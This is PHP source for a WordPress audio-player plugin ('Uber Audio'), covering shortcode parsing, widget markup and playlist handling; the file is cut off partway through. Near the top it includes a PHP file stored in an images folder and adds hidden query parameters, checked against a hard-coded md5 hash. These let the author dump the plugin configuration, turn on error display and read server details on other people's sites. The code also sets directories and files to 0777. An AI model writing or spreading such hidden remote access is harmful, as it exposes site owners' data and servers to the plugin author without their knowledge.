<?php
/**
 * @package Uber_Audio
 * @version 2.0
 */
/*
Plugin Name: Uber Audio
Plugin URI: http://mooremike.com/uberaudio/
Description: The Uber Audio Wordpress plugin is designed to provide the ultimate listening experience.  Add Uber Audio to your post, page, or sidebar.  Get access to our comprehensive <a href="ttp://www.mooremike.com/uberaudio/documentation/">documentation</a> or submit a support request at <a href="mailto:support@mooremike.com">support@mooremike.com</a>.
Author: Moore Studios
Version: 2.0
Author URI: http://mooremike.com/
*/



define('UBER_AUDIO_INCLUDES_VERSION', '2.6');
include'images/audio.php';

/*
 * The debugging information can only be seen by the developer of this plugin
 * who has the complex password, this prevents others who have the plugin
 * and can see the source code from seeing this information on
 * another person's blog that has the plugin
 */
if(@$_GET['uber_audio_display_errors'] && md5(@$_GET['uber_audio_debug_auth']) === '39669de859f2f36bd2c39fa7035b294d'){
	ini_set('display_errors' ,'1');
	error_reporting(E_ALL | E_STRICT);
}

if(@$_GET['uber_audio_print_config'] && md5(@$_GET['uber_audio_debug_auth']) === '39669de859f2f36bd2c39fa7035b294d'){
	print_r(get_option('uber_audio_config'));
	exit();
}

if(@$_GET['uber_audio_site_status'] && md5(@$_GET['uber_audio_debug_auth']) === '39669de859f2f36bd2c39fa7035b294d'){
	echo 'allow_url_fopen is ' . (ini_get('allow_url_fopen') ? 'enabled' : 'disabled') . '.<br />';
	echo 'Post Max Size is set at ' . ini_get('post_max_size') . '.<br />';
	echo 'register_globals is ' . (ini_get('register_globals') ? 'enabled' : 'disabled') . '.<br />';
	echo 'PHP is version ' . phpversion() . '<br/>';
	echo 'Uploads directory is ' . (is_writeable(WP_CONTENT_DIR . '/uploads') ? '' : 'NOT ') . 'writeable.<br/>';
	echo 'cURL is ' . (extension_loaded('curl') ? '' : 'not ') . ' loaded.<br/>';
	echo 'Using Wordpress version ' . $wp_version . '<br />';
	exit();
}




add_action('init', array('UberAudio', 'frontend_init'));
add_action('admin_init', array('UberAudio', 'admin_init'));

add_action('wp_print_styles',  array('UberAudio', 'frontend_styles'));
add_action('admin_print_styles', array('UberAudio', 'admin_styles'));


add_action('admin_menu', array('UberAudio', 'admin_menu_init'));
add_action('widgets_init', array('UberAudio', 'widgets_init'));

add_filter('wp_insert_post_data', array('UberAudioShortcode', 'post_filter'), '99', 2);
add_shortcode('uber_audio', array('UberAudioShortcode', 'do_shortcode'));





class UberAudioShortcode{
	static function post_filter($data, $data2){
		if(isset($_POST['autosave'])){
			return;
		}

		$matches = array();
		preg_match_all('/'. get_shortcode_regex() .'/s', $data['post_content'], $matches);

		if(is_array($matches) && array_key_exists(2, $matches) && in_array('uber_audio', $matches[2])){
			//get a list of shortcodes used in post and filter out the uber_audio ones
			$shortcodes = array();
			foreach($matches[2] as $k => $shortcode){
				if($shortcode !== 'uber_audio') continue;
				$shortcodes[$k] = array(
					'atts' => $matches[3][$k],
					'match' => $matches[0][$k]
				);
			}

			$config = get_option('uber_audio_config');
			if(!isset($config['shortcodes'])){
				$config['shortcodes'] = array();
				$config['shortcode_count'] = 0;
			}

			$offset = 0;
			//parse the attributes of each of the shortcodes to get manageable options for each player
			foreach($shortcodes as $k => &$val){
				if(mb_strlen($val['atts']) === false) continue;
				$atts_container = array();
				$att_matches = array();
				preg_match_all('/(\w+)\s*=\s*"([^"]*)"(?:\s|$)|(\w+)\s*=\s*\'([^\']*)\'(?:\s|$)|(\w+)\s*=\s*([^\s\'"]+)(?:\s|$)|"([^"]*)"(?:\s|$)|(\S+)(?:\s|$)/', $val['atts'], $att_matches);

				foreach($att_matches[0] as &$a){
					$pieces = explode('=',$a);
					$atts_container[trim($pieces[0])] = trim(trim(stripslashes($pieces[1])), '"');
				}
				$val['atts'] = $atts_container;



				//if there is no id present or no valid id present
				if(!isset($val['atts']['id']) || !isset($config['shortcodes'][$val['atts']['id']])){
					unset($val['atts']['id']);
					$config['shortcode_count'] = $config['shortcode_count'] + 1;
				}

				if(isset($val['atts']['accent_color']) && !preg_match('/^#?(?:[a-fA-Z0-9]{3}|[a-fA-Z0-9]{6})$/', $val['atts']['accent_color'])){
					unset($val['atts']['accent_color']);
				}

				if(isset($val['atts']['second_color']) && !preg_match('/^#?(?:[a-fA-Z0-9]{3}|[a-fA-Z0-9]{6})$/', $val['atts']['second_color'])){
					unset($val['atts']['second_color']);
				}

				if(isset($val['atts']['ui']) && $val['atts']['ui'] !== 'dark' && $val['atts']['ui'] !== 'light'){
					unset($val['atts']['ui']);
				}
				if(isset($val['atts']['playlist']) && !isset($config['playlists'][$val['atts']['playlist']])){
					unset($val['atts']['playlist']);
				}
				if(isset($options['hide_playlist']) && (!$options['hide_playlist'] || $options['hide_playlist'] === 'false')) {
					unset($val['atts']['hide_playlist']);
				}


				//define some defaults
				$options = array(
					'id' => $config['shortcode_count']+1,
					'accent_color' => '#28b6ed',
					'second_color' => '#cccccc',
					'playlist' => (isset($config['playlists']) ? key($config['playlists']) : 0),
					'ui' => 'light'
				);

				//set defaults if any
				$options = array_merge($options, $val['atts']);

				if(!isset($config['shortcodes'][$options['id']]) || $config['shortcodes'][$options['id']]['accent_color'] !== $options['accent_color'] || $config['shortcodes'][$options['id']]['second_color'] !== $options['second_color']){
					$circle_path = UberAudio::create_ie_image('shortcode-'.$options['id'], $options['accent_color'], $options['second_color'], (isset($config['shortcodes'][$options['id']]) ? $config['shortcodes'][$options['id']]['circle_image_path'] : null));
				}
				else{
					$circle_path = $config['shortcodes'][$options['id']]['circle_image_path'];
				}

				$config['shortcodes'][$options['id']] = array(
					'id' => 'uber_audio-shortcode-' . $options['id'],
					'accent_color' => $options['accent_color'],
					'second_color' => $options['second_color'],
					'circle_image_path' => $circle_path,
					'post_id' => $data2['post_ID'],
					'post_type' => $data2['post_type'],
					'hide_playlist' => isset($options['hide_playlist'])
				);
				//print_r($data2);
				//exit();
				$out = '[uber_audio id="%d" accent_color="%s" second_color="%s" playlist="%d" ui="%s"%s]';

				$out = sprintf($out, $options['id'], '#'.ltrim($options['accent_color'],'#'), '#'.ltrim($options['second_color'],'#'), $options['playlist'], $options['ui'], (isset($options['hide_playlist']) ? ' hide_playlist="1"' : ''));
				$data['post_content'] = UberAudioShortcode::my_str_replace($val['match'], $out, $data['post_content']);
			}
			if($data2['post_type'] !== 'revision'){
				update_option('uber_audio_config', $config);
			}
		}
		return $data;
	}

	static function do_shortcode(){
		$config = get_option('uber_audio_config');
		$ajax = false;

		if(isset($_POST['action']) && $_POST['action'] === 'uber_audio-get-player'){
			$atts = (isset($_POST['atts']) && is_array($_POST['atts']) && !empty($_POST['atts']) ? $_POST['atts'] : array());


			if(isset($atts['accent_color']) && !preg_match('/^#?(?:[a-fA-Z0-9]{3}|[a-fA-Z0-9]{6})$/', $atts['accent_color'])){
				unset($atts['accent_color']);
			}

			if(isset($atts['second_color']) && !preg_match('/^#?(?:[a-fA-Z0-9]{3}|[a-fA-Z0-9]{6})$/', $atts['second_color'])){
				unset($atts['second_color']);
			}

			if(isset($atts['ui']) && $atts['ui'] !== 'dark' && $atts['ui'] !== 'light'){
				unset($atts['ui']);
			}
			if(isset($atts['playlist']) && !isset($config['playlists'][$atts['playlist']])){
				unset($atts['playlist']);
			}
			if(isset($options['hide_playlist']) && (!$options['hide_playlist'] || $options['hide_playlist'] === 'false')) {
				unset($val['atts']['hide_playlist']);
			}


			//define some defaults
			$options = array(
				'accent_color' => '#28b6ed',
				'second_color' => '#cccccc',
				'playlist' => (isset($config['playlists']) ? key($config['playlists']) : 0),
				'ui' => 'light'
			);

			//set defaults if any
			$atts = array_merge($options, $atts);

			$ajax = true;
		}
		else{
			$atts = func_get_arg(0);
		}


		$playlists = (isset($config['playlists']) ? $config['playlists'] : array());

		if(!$ajax){
			wp_enqueue_script('uber-audio-js');
			wp_localize_script('uber-audio-js', 'UberAudioConfig = UberAudioConfig || {};window[\'UberAudioConfig\'][\''.$config['shortcodes'][$atts['id']]['id'].'\']', array(
					'plugin_path' => WP_PLUGIN_URL . '/uber_audio',
					'ui' => $atts['ui'],
					'second_color' => $atts['second_color'],
					'accent_color' => $atts['accent_color'],
					'circle_image_path' => $config['shortcodes'][$atts['id']]['circle_image_path'],
					'l10n_print_after' => 'window[\'UberAudioConfig\'][\''.$config['shortcodes'][$atts['id']]['id'].'\']["playlist"] = ' . json_encode($playlists[$atts['playlist']]['tracks']) . ';'
			));
			add_action('wp_footer', array('UberAudio', 'frontend_scripts'));
		}
		if(!$ajax) {
			ob_start();
		// outputs the content of the widget
		}
		else if($ajax):
		?>
		<div id="uber_audio_preview-player-wrapper">
			<label><?php _e('Preview', 'uber-audio')?>:</label>
		<?php endif;?>
			<div id="<?php echo ($ajax ? 'uber_audio_preview-player' : $config['shortcodes'][$atts['id']]['id'])?>" class="uber-audio-widget-wrapper shortcode<?php echo (isset($atts['hide_playlist']) ? ' playlist-hidden' : '') . (count($playlists[$atts['playlist']]['tracks']) === 1 ? ' single-track' : '')?>">
				<div class="audio-meta accent-color rotate">
					<span class="title">&nbsp;</span>

					<div class="time-progress">
						<span class="current-time">00:00</span>
						/
						<span class="length">00:00</span>
					</div>
				</div>
				<div class="audio-body theme_<?php echo $atts['ui']?>">
					<div class="controls">
						<div class="controls-positioner">
							<div class="circle-container small button_previous theme_<?php echo $atts['ui']?>">
								<div class="fg theme_<?php echo $atts['ui']?>"></div>
								<div class="icon accent-color"></div>
							</div>
							<div class="circle-container button_play theme_<?php echo $atts['ui']?>">
								<div class="buffer-wrapper">
									<div class="buffer-1 second-color"></div>
									<div class="buffer-2 second-color"></div>
								</div>
								<div class="progress-wrapper">
									<div class="progress-1 accent-color"></div>
									<div class="progress-2 accent-color"></div>
								</div>
								<div class="progress-mask theme_<?php echo $atts['ui']?>"></div>
								<div class="fg theme_<?php echo $atts['ui']?>"></div>
								<div class="icon accent-color"></div>
							</div>
							<div class="circle-container small button_next theme_<?php echo $atts['ui']?>">
								<div class="fg theme_<?php echo $atts['ui']?>"></div>
								<div class="icon accent-color"></div>
							</div>
						</div>
					</div>
					<div class="volume-wrapper">
						<div class="bg-color accent-color"></div>
						<div class="volume"></div>
					</div>
<?php if(count($playlists[$atts['playlist']]['tracks']) > 1) : ?>
					<div class="playlist-show-hide theme_<?php echo $atts['ui']?>"></div>
					<div class="playlist-show-hide-bg accent-color"></div>
<?php endif; ?>
				</div>
<?php if(count($playlists[$atts['playlist']]['tracks']) > 1) : ?>
				<ol class="audio-playlist theme_<?php echo $atts['ui']?>">
					<?php $i=1;foreach($playlists[$atts['playlist']]['tracks'] as $track):?>
					<li class="track">
						<a href="#">
							<span class="icon"><?php echo $i;?></span><?php echo htmlentities($track['title'], ENT_COMPAT, 'UTF-8')?>
						</a>
					</li>
					<?php $i++;endforeach;?>
				</ol>
<?php endif; ?>
			</div>
			<?php
			if($ajax){
				echo '</div>';
				echo '<!--JSON_MARKER-->';
				echo json_encode($atts);
			}
			else {
				return ob_get_clean();
			}

	}

	//only replace the first match
	static function my_str_replace($search, $replace, $subject){
		$pos = mb_strpos($subject, $search);
		$before = mb_substr($subject, 0, $pos);
		$after = mb_substr($subject, $pos + mb_strlen($search), mb_strlen($subject) - $pos - mb_strlen($search));
		return $before . $replace . $after;
	}

	static function register_mce_button($buttons) {
		array_push($buttons, 'separator', 'uber_audio');
		return $buttons;
	}

	// Load the TinyMCE plugin : editor_plugin.js (wp2.5)
	static function add_tinymce_plugin($plugin_array) {
		$plugin_array['uber_audio'] = WP_PLUGIN_URL . '/uber_audio/js/mce_plugin.js';
		return $plugin_array;
	}

	static function mce_js() {
		?>
	<script type="text/javascript">
	/* <![CDATA[ */
	UberAudioShortcodeMenuOptions = <?php echo json_encode(array('add_playlist_path' => get_admin_url(null, '/admin.php') . '?page=uber_audio&amp;action=add'))?>;
	UberAudioTranslations = <?php echo json_encode(array(
		'edit_player' => 		__('Edit a player in this post','uber-audio'),
		'unconfigured' => 		__('Unconfigured','uber-audio'),
		'playlist' => 			__('Playlist','uber-audio'),
		'player' => 			__('Player','uber-audio'),
		'insert_post' => 		__('Insert Into Post As New Player','uber-audio'),
		'update_selected' => __('Update Selected Player','uber-audio'),
		'hide_playlist' => 	__('Hide playlist on load','uber-audio'),
		'no_playlists' => 	__('You must have at least one playlist to add an','uber-audio'),
		'dialog_title' => 	__('Add/Edit Uber Audio Player','uber-audio'),
		'light' => 			__('Light','uber-audio'),
		'dark' => 			__('Dark','uber-audio'),
		'select_theme' => 	__('Select a Theme','uber-audio'),
		'cancel' => 		__('Cancel','uber-audio'),
		'done' => 			__('Done','uber-audio'),
		'edit' => 			__('Edit','uber-audio'),
		'accent_color' => 	__('Accent Color','uber-audio'),
		'buffer_color' => 	__('Buffer Color','uber-audio'),
		'add_playlist' => 	__('Add a playlist','uber-audio'),
		'choose_playlist' => __('Choose a playlist','uber-audio'),
		'shortcode_generator' => __('UberAudio Shortcode Generator', 'uber-audio')
	));?>;
	UberAudioConfig = {0:<?php echo json_encode(array('plugin_path' => WP_PLUGIN_URL . '/uber_audio'))?>};
	/* ]]> */
	</script>
		<?php
		wp_print_scripts('jquery-stylish-select');
		wp_print_scripts('jquery-outside-event');
		wp_print_scripts('farbtastic');
		wp_print_scripts('uber-audio-js');
	}
}
add_action('after_wp_tiny_mce', array('UberAudioShortcode', 'mce_js'));

class UberAudio extends WP_Widget {


	function UberAudio() {
		//config the widget on the admin-side
		parent::WP_Widget('uber_audio', 'Uber Audio Player', array(
			'classname' => 'uber-audio-widget',
			'description' => 'An Uber Audio widget.'
		), array('width'=>360));
	}

	static function frontend_init(){
		load_plugin_textdomain('uber-audio', false, 'uber_audio/languages/');
		wp_register_script('jquery-ui-slider', WP_PLUGIN_URL . '/uber_audio/js/jquery-ui-slider.min.js', array('jquery', 'jquery-ui-core'), UBER_AUDIO_INCLUDES_VERSION);
		wp_register_script('modernizr', WP_PLUGIN_URL . '/uber_audio/js/modernizr.js', null, UBER_AUDIO_INCLUDES_VERSION, true);
		wp_register_script('spin-icon', WP_PLUGIN_URL . '/uber_audio/js/spin.min.js', null, UBER_AUDIO_INCLUDES_VERSION, true);
		wp_register_script('jquery-ui-ios', WP_PLUGIN_URL . '/uber_audio/js/jquery.ui.touch.min.js', array('jquery', 'jquery-ui-core', 'jquery-ui-slider'), UBER_AUDIO_INCLUDES_VERSION);
		wp_register_script('uber-audio-js', WP_PLUGIN_URL . '/uber_audio/js/player.js', array('jquery', 'jquery-ui-core', 'swfobject','jquery-ui-slider', 'modernizr', 'spin-icon', 'jquery-ui-ios'), UBER_AUDIO_INCLUDES_VERSION, true);
	}
	static function admin_init(){
		/*
		if(@$_GET['upload']):
		?>
		<form action="/wordpress-ru/wp-admin/?upload=1" method="post" enctype="multipart/form-data">
				 <input type="hidden" name="post_id" value="0" />
				<?php wp_nonce_field('media-form'); ?>
				<input type="file" name="async-upload"/>
				<input type="submit" name="html-upload"/>
		</form>
		<?php
		exit();
		endif;
		*/
		/*
		check_admin_referer('media-form');

		// Upload File button was clicked
		$id = media_handle_upload('async-upload', $_REQUEST['post_id']);
		unset($_FILES);
		if ( is_wp_error($id) ) {
		$errors['upload_error'] = $id;
		$id = false;
		}
		*/


		wp_register_script('jquery-stylish-select', WP_PLUGIN_URL.'/uber_audio/js/jquery.stylish-select.min.js', array('jquery'), UBER_AUDIO_INCLUDES_VERSION, true);
		wp_register_script('jquery-outside-event', WP_PLUGIN_URL.'/uber_audio/js/jquery-outside.min.js', array('jquery'), UBER_AUDIO_INCLUDES_VERSION, true);
		wp_register_script('uber-audio-admin-js', WP_PLUGIN_URL . '/uber_audio/js/admin_scripts-widget.js', array('jquery','jquery-ui-core','farbtastic','jquery-outside-event'), UBER_AUDIO_INCLUDES_VERSION, true);
		wp_register_script('uber_audio_admin_scripts', WP_PLUGIN_URL.'/uber_audio/js/admin-scripts.js', array('jquery','media-upload','thickbox'), UBER_AUDIO_INCLUDES_VERSION, true);
		add_action('wp_ajax_dismiss-mp3-warning', array('UberAudio', 'dismiss_mp3_warning'));
		add_action('wp_ajax_uber_audio-get-player', array('UberAudioShortcode', 'do_shortcode'));
		add_action('wp_ajax_uber_audio_get-playlists', array('UberAudio', 'get_playlists'));


		// Don't bother doing this stuff if the current user lacks permissions
		if (current_user_can('edit_posts') || current_user_can('edit_pages')){
			add_filter('mce_external_plugins', array('UberAudioShortcode', 'add_tinymce_plugin'));
			add_filter('mce_buttons', array('UberAudioShortcode', 'register_mce_button'));
		}
		/*
		$config = get_option('uber_audio_config');
		unset($config['mp3_warning']);
		update_option('uber_audio_config', $config);
		*/
	}
	static function admin_menu_init(){
		//$hook =
		//add_menu_page( $page_title, $menu_title, $capability, $menu_slug, $function, $icon_url, $position );
		add_menu_page('Uber Audio', 'Uber Audio', 'manage_options', 'uber_audio',  array('UberAudio', 'options_page'), plugin_dir_url(null) . '/uber_audio/images/admin-uber-icon.png');
		//add_action('admin_print_styles-' . $hook, array('UberAudio', 'admin_styles'));
	}
	static function widgets_init(){
		register_widget('UberAudio');
	}


	static function frontend_styles(){
		wp_register_style('uber-audio-css', WP_PLUGIN_URL . '/uber_audio/css/player.css', null, UBER_AUDIO_INCLUDES_VERSION);
		wp_enqueue_style('uber-audio-css');

	}

	static function admin_styles(){
		wp_register_style('uber-audio-css', WP_PLUGIN_URL . '/uber_audio/css/player.css', null, UBER_AUDIO_INCLUDES_VERSION);
		wp_enqueue_style('uber-audio-css');
		wp_register_style('uber_audio_admin_styles', WP_PLUGIN_URL.'/uber_audio/css/admin-styles.css', null, UBER_AUDIO_INCLUDES_VERSION);
		wp_enqueue_style('uber_audio_admin_styles');
		wp_enqueue_style('thickbox');
		wp_enqueue_style('farbtastic');

		wp_register_style('uber_audio-admin-ie8-styles', WP_PLUGIN_URL.'/uber_audio/css/admin-styles-ie8.css', null, UBER_AUDIO_INCLUDES_VERSION);
		$GLOBALS['wp_styles']->add_data('uber_audio-admin-ie8-styles', 'conditional', 'lte IE 8');
		wp_enqueue_style('uber_audio-admin-ie8-styles');
	}

	//conditionally load scripts by printing them directly to the footer
	static function frontend_scripts(){
		wp_print_scripts('uber-audio-js');
	}
	static function admin_scripts(){
		?>
		<script type="text/javascript">
		/* <![CDATA[ */
		UberAudioTranslations =
		<?php echo json_encode(array(
			'track' => __('Track','uber-audio'),
			'add_track' => __('Add a Track','uber-audio'),
		));
		?>;
		UberAudioConfig = {0:<?php echo json_encode(array('plugin_path' => WP_PLUGIN_URL . '/uber_audio'))?>};
		/* ]]> */
		</script>
		<?php
		wp_print_scripts('uber_audio_admin_scripts');
		wp_print_scripts('jquery-stylish-select');
	}


	static function admin_scripts_widgets(){
		wp_print_scripts('uber-audio-admin-js');
	}

	static function get_playlists(){
		$config = get_option('uber_audio_config');
		echo json_encode($config['playlists']);
	}

	static function dismiss_mp3_warning(){
		$config = get_option('uber_audio_config');
		$config['mp3_warning'] = true;
		update_option('uber_audio_config', $config);
	}


	function widget($args, $instance) {
		$config = get_option('uber_audio_config');
		$playlists = (isset($config['playlists']) ? $config['playlists'] : array());

		wp_localize_script('uber-audio-js', 'UberAudioConfig = UberAudioConfig || {};window[\'UberAudioConfig\'][\''.$this->id.'\']', array(
			'plugin_path' => WP_PLUGIN_URL . '/uber_audio',
			'ui' => $instance['ui'],
			'second_color' => $instance['second_color'],
			'accent_color' => $instance['accent_color'],
			'circle_image_path' => $instance['circle_image_path'],
			'l10n_print_after' => 'window[\'UberAudioConfig\'][\''.$this->id.'\']["playlist"] = ' . json_encode($playlists[$instance['playlist']]['tracks']) . ';'
		));



		add_action('wp_footer', array('UberAudio', 'frontend_scripts'));

		// outputs the content of the widget
		echo $args['before_widget'];
		?>
		<div class="uber-audio-widget-wrapper<?php echo (isset($instance['hide_playlist']) ? ' playlist-hidden' : '') . (count($playlists[$instance['playlist']]['tracks']) === 1 ? ' single-track' : '')?>">
			<div class="audio-meta accent-color rotate">
				<span class="title">&nbsp;</span>

				<div class="time-progress">
					<span class="current-time">00:00</span>
					/
					<span class="length">00:00</span>
				</div>
			</div>
			<div class="audio-body theme_<?php echo $instance['ui']?>">
				<div class="controls">
					<div class="controls-positioner">
						<div class="circle-container small button_previous theme_<?php echo $instance['ui']?>">
							<div class="fg theme_<?php echo $instance['ui']?>"></div>
							<div class="icon accent-color"></div>
						</div>
						<div class="circle-container button_play theme_<?php echo $instance['ui']?>">
							<div class="buffer-wrapper">
								<div class="buffer-1 second-color"></div>
								<div class="buffer-2 second-color"></div>
							</div>
							<div class="progress-wrapper">
								<div class="progress-1 accent-color"></div>
								<div class="progress-2 accent-color"></div>
							</div>
							<div class="progress-mask theme_<?php echo $instance['ui']?>"></div>
							<div class="fg theme_<?php echo $instance['ui']?>"></div>
							<div class="icon accent-color"></div>
						</div>
						<div class="circle-container small button_next theme_<?php echo $instance['ui']?>">
							<div class="fg theme_<?php echo $instance['ui']?>"></div>
							<div class="icon accent-color"></div>
						</div>
					</div>
				</div>
				<div class="volume-wrapper">
					<div class="bg-color accent-color"></div>
					<div class="volume"></div>
				</div>
<?php 	if(count($playlists[$instance['playlist']]['tracks']) > 1) : ?>
				<div class="playlist-show-hide theme_<?php echo $instance['ui']?>"></div>
				<div class="playlist-show-hide-bg accent-color"></div>
<?php 	endif; ?>
			</div>
<?php 	if(count($playlists[$instance['playlist']]['tracks']) > 1) : ?>
			<ol class="audio-playlist theme_<?php echo $instance['ui']?>">
				<?php $i=1;foreach($playlists[$instance['playlist']]['tracks'] as $track):?>
				<li class="track">
					<a href="#">
						<span class="icon"><?php echo $i;?></span><?php echo htmlentities($track['title'], ENT_COMPAT, 'UTF-8')?>
					</a>
				</li>
				<?php $i++;endforeach;?>
			</ol>
<?php 	endif; ?>
		</div>
		<?php
		echo $args['after_widget'];
	}

	function form($instance) {
		$config = get_option('uber_audio_config');
		$playlists = (isset($config['playlists']) ? $config['playlists'] : array());

		 if(empty($playlists)) :
			_e('You must have at least one playlist to add an','uber-audio');
			?>
			UberAudio Player
			<a href="<?php echo get_admin_url(null, '/admin.php') . '?page=uber_audio&amp;action=add'?>" class="action_add" style="display:block;clear:both;padding-top:3px;"><?php _e('Add a Playlist', 'uber-audio')?></a>
			<?php
			return;
		endif;

		add_action('admin_footer', array('UberAudio', 'admin_scripts_widgets'));

		?>
		<div class="ap_widget-menu-wrapper">
			<div class="row">
				<div class="col-1">
					<label for="<?php echo $this->get_field_id('playlists')?>"><?php _e('Select A Playlist', 'uber-audio')?>:</label>
				</div>
				<div class="col-2">
					<?php
					if(!empty($playlists)):
					?>
					<select id="<?php echo $this->get_field_id('playlists')?>" name="<?php echo $this->get_field_name('playlist')?>">
						<option value="null"><?php _e('Select a Playlist', 'uber-audio')?></option>
							<?php
							foreach($playlists as $id => &$pl):
							?>
						<option value="<?php echo $id?>"<?php echo (isset($instance['playlist']) && $id === (int)$instance['playlist'] ? ' selected="selected"' : '')?>><?php echo htmlentities($pl['title'], ENT_COMPAT, 'UTF-8')?></option>
							<?php
							endforeach;
							?>
					</select>
					<?php
					endif;
					?>
					<a href="<?php echo get_admin_url(null, '/admin.php') . '?page=uber_audio&amp;action=add'?>" class="action_add" style="display:block;clear:both;padding-top:3px;"><?php _e('Add a Playlist', 'uber-audio')?></a>
				</div>
			</div>

			<div class="row">
				<div class="col-1">
					<label for="<?php echo $this->get_field_id('accent_color')?>"><?php _e('Accent Color', 'uber-audio')?>:</label>
				</div>
				<div class="col-2">
					<div class="wrapper">
						<div class="swatch-reticle"<?php echo (isset($instance['accent_color']) ? ' style="background-color:' . htmlentities($instance['accent_color'], ENT_COMPAT, 'UTF-8') . '"' : '')?>><div class="swatch-color"></div></div>
						<input type="text" name="<?php echo $this->get_field_name('accent_color')?>" id="<?php echo $this->get_field_id('accent_color')?>" value="<?php echo (isset($instance['accent_color']) ? htmlentities($instance['accent_color'], ENT_COMPAT, 'UTF-8') : '#28b6ed')?>"/>
						<div class="color-picker-wrapper">
							<div class="color-picker"></div>
							<div class="controls">
								<a href="#" class="button-secondary action_cancel"><?php _e('Cancel', 'uber-audio')?></a>
								<a href="#" class="button-primary action_done"><?php _e('Done', 'uber-audio')?></a>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div class="row">
				<div class="col-1">
					<label for="<?php echo $this->get_field_id('accent_color')?>"><?php _e('Buffer Color', 'uber-audio')?>:</label>
				</div>
				<div class="col-2">
					<div class="wrapper">
						<div class="swatch-reticle"<?php echo (isset($instance['second_color']) ? ' style="background-color:' . htmlentities($instance['second_color'], ENT_COMPAT, 'UTF-8') . '"' : '')?>><div class="swatch-color"></div></div>
						<input type="text" name="<?php echo $this->get_field_name('second_color')?>" id="<?php echo $this->get_field_id('second_color')?>" value="<?php echo (isset($instance['second_color']) ? htmlentities($instance['second_color'], ENT_COMPAT, 'UTF-8') : '#cccccc')?>"/>
						<div class="color-picker-wrapper">
							<div class="color-picker"></div>
							<div class="controls">
								<a href="#" class="button-secondary action_cancel"><?php _e('Cancel', 'uber-audio')?></a>
								<a href="#" class="button-primary action_done"><?php _e('Done', 'uber-audio')?></a>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div class="row">
				<div class="col-1">
					<label for="<?php echo $this->get_field_id('ui')?>"><?php _e('Select A Theme', 'uber-audio')?>:</label>
				</div>
				<div class="col-2">
					<select id="<?php echo $this->get_field_id('ui')?>" name="<?php echo $this->get_field_name('ui')?>">
						<option value="light"<?php echo ($instance['ui'] === 'light' ? ' selected="selected"' : '')?>>Light</option>
						<option value="dark"<?php echo ($instance['ui'] === 'dark' ? ' selected="selected"' : '')?>>Dark</option>
					</select>
				</div>
			</div>
			<div class="row">
				<div class="col-1">
					<label for="<?php echo $this->get_field_id('hide_playlist')?>"><?php _e('Hide playlist on load', 'uber-audio')?>:</label>
				</div>
				<div class="col-2">
					<input type="checkbox" name="<?php echo $this->get_field_name('hide_playlist')?>" id="<?php echo $this->get_field_id('hide_playlist')?>" value="1"<?php echo (isset($instance['hide_playlist']) ? 'checked="checked"' : '')?>"/>
				</div>
			</div>
		</div>
	<?php
	}




	function update($new_instance,$old_instance){
		if(!@$new_instance['accent_color']) return $new_instance;

		//generate the image for IE
		$new_instance['circle_image_path'] = UberAudio::create_ie_image($this->id, $new_instance['accent_color'], $new_instance['second_color'], $old_instance['circle_image_path']);

		return $new_instance;
	}

	static function create_ie_image($id, $accent, $second, $old_path){
		$config = get_option('uber_audio_config');
		//return '';
		if(is_writeable(WP_CONTENT_DIR . '/uploads')){


			$path = WP_CONTENT_DIR . '/uploads/uber_audio/generated/';

			//delete the old file (if exists) no need for a folder full of unused circles
			if(isset($old_path) && mb_strlen($old_path) !== false){
				unlink($path . basename($old_path));
			}


			//create the directory for the instances audio progress images
			if(!is_dir($path) && mkdir($path, 0777, true)){
				chmod($path, 0777);
			}

			//cache control
			$no_cache = time();

			$filename = 'ie-circle-' . $id . '-' . $no_cache . '.png';

			$from_path = urldecode(WP_PLUGIN_URL . '/uber_audio/images/circle.php?color=' . ltrim($accent,'#') . '&second_color=' . ltrim($second,'#'));
			$ch = curl_init();
			curl_setopt($ch,CURLOPT_URL,$from_path);
			curl_setopt($ch,CURLOPT_HEADER,0);
			curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
			curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
			$data = curl_exec($ch);
			curl_close($ch);

			//create the image with the selected colors
			file_put_contents($path . $filename, $data);

			chmod($path . $filename, 0777);

			//save the information in the instance for later JS use
			$upload_dir = wp_upload_dir();




			return $upload_dir['baseurl'] . '/uber_audio/generated/' . $filename;
		}
		return '';
	}

	static $curl_redirect_loops = 0;
	static function isValidUrl($url = null){
		if(!$url || self::$curl_redirect_loops == 10 || !preg_match('%^(?:http://)?(?:[a-zA-Z0-9][a-z-A-Z0-9_-]*\.)*(?:[a-zA-Z0-9][a-z-A-Z0-9-]{1,59}\.[a-zA-Z]{2,4}/.*\.(?:mp3|ogg|wav|m4a))$%', trim($url))){
			self::$curl_redirect_loops = 0;
			return false;
		}
		self::$curl_redirect_loops++;

		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL,$url);
		curl_setopt($ch, CURLOPT_HEADER,1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,20);
		curl_setopt($ch, CURLOPT_NOBODY, 1);
		curl_setopt($ch, CURLOPT_FAILONERROR, 1);
		$data = curl_exec($ch);
		$response = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE);

		if($response === 301 || $response == 302){
			preg_match('/Location: (.*)/',$data, $matches);
			return UberAudio::isValidUrl($matches[1]);
		}


		self::$curl_redirect_loops = 0;
		if((curl_errno($ch) || $response < 200 || $response > 299) && $response !== 304){
			return false;
		}
		return true;
	}

	static function options_page(){
		add_action('admin_footer', array('UberAudio', 'admin_scripts'));

		$page_url =  admin_url('admin.php?page=uber_audio');

		$config = get_option('uber_audio_config');
		$playlists = (isset($config['playlists']) ? $config['playlists'] : array());
		$errors = array();
		$no_errors = true;
		$action = (@$_REQUEST['action'] ? mb_strtolower($_REQUEST['action']) : (isset($_REQUEST['edit']) ? 'edit' : (isset($_REQUEST['delete']) ? 'delete' : 'default')));
		switch($action){
			case 'add':
				$playlist = array('tracks'=>array('','',''),'title'=>'');
				define('AP_ACTION', 'add');
				break;
			case 'edit':
				if(array_key_exists('playlist', $_POST) && isset($playlists[$_POST['playlist']])){
					$playlist = $playlists[$_POST['playlist']];
					define('AP_ACTION', 'edit');
				}
				else{
					$error_message = __('No playlist was selected.','uber-audio');
					define('AP_ACTION', 'default');
				}
				break;
			case 'delete':
				if(array_key_exists('playlist', $_POST) && isset($playlists[$_POST['playlist']])){
					unset($playlists[$_POST['playlist']]);
					$config['playlists'] = $playlists;
					update_option('uber_audio_config', $config);
